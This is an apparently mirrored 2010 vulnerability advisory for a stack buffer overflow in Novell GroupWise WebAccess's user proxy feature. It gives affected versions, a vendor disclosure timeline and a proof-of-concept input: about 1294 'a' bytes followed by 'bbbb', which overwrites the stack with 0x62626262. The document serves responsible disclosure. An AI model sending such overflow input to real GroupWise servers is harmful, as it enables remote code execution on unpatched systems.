Home / os / win7

Novell Groupwise Webaccess Stack Overflow

Posted on 15 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Novell Groupwise Webaccess Stack Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
Novell Groupwise Webaccess Stack Overflow
=========================================


#####################################################################################
 
Application:   Novell Groupwise Webaccess Stack Overflow
 
Platforms:   Windows, Linux &amp; Netware (GroupWise 7.0, 7.01, 7.02, 7.03x, 7.04, 8.0, 8.01x)
 
Exploitation:   Remote code execution
 
CVE Number: 
 
Novell TID:  7006380
 
Author:   Francis Provencher (Protek Research Lab's)
 
Blog:   http://www.protekresearchlab.com/
 
 
#####################################################################################
 
1) Introduction
2) Report Timeline
3) Technical details
4) The Code
 
 
#####################################################################################
 
===============
1) Introduction
===============
 
Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse.
 
Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients.
 
(http://en.wikipedia.org/wiki/Novell)
 
#####################################################################################
 
============================
2) Report Timeline
============================
 
2010-05-27 Vendor Contact
2010-05-28 Vendor repsonse
2010-07-15 Patch is release
 
 
#####################################################################################
 
============================
3) Technical details
============================
 
The user Proxy feature of Novell GroupWise WebAccess is vulnerable to a stack overflow exploit. An authenticated user could potentially trigger and execute arbitrary code with &quot;Root&quot; or &quot;SYSTEM&quot; rigths. To overwrite the stack, 1294 byte have to been sent to the user proxy feature.
 
#####################################################################################
 
===========
4) The Code
===========
 
This issue can be trigger manually;
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
 
aaaaaaaaaaaaaaaaabbbb
 
The stack will be overwrite with 0x62626262


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :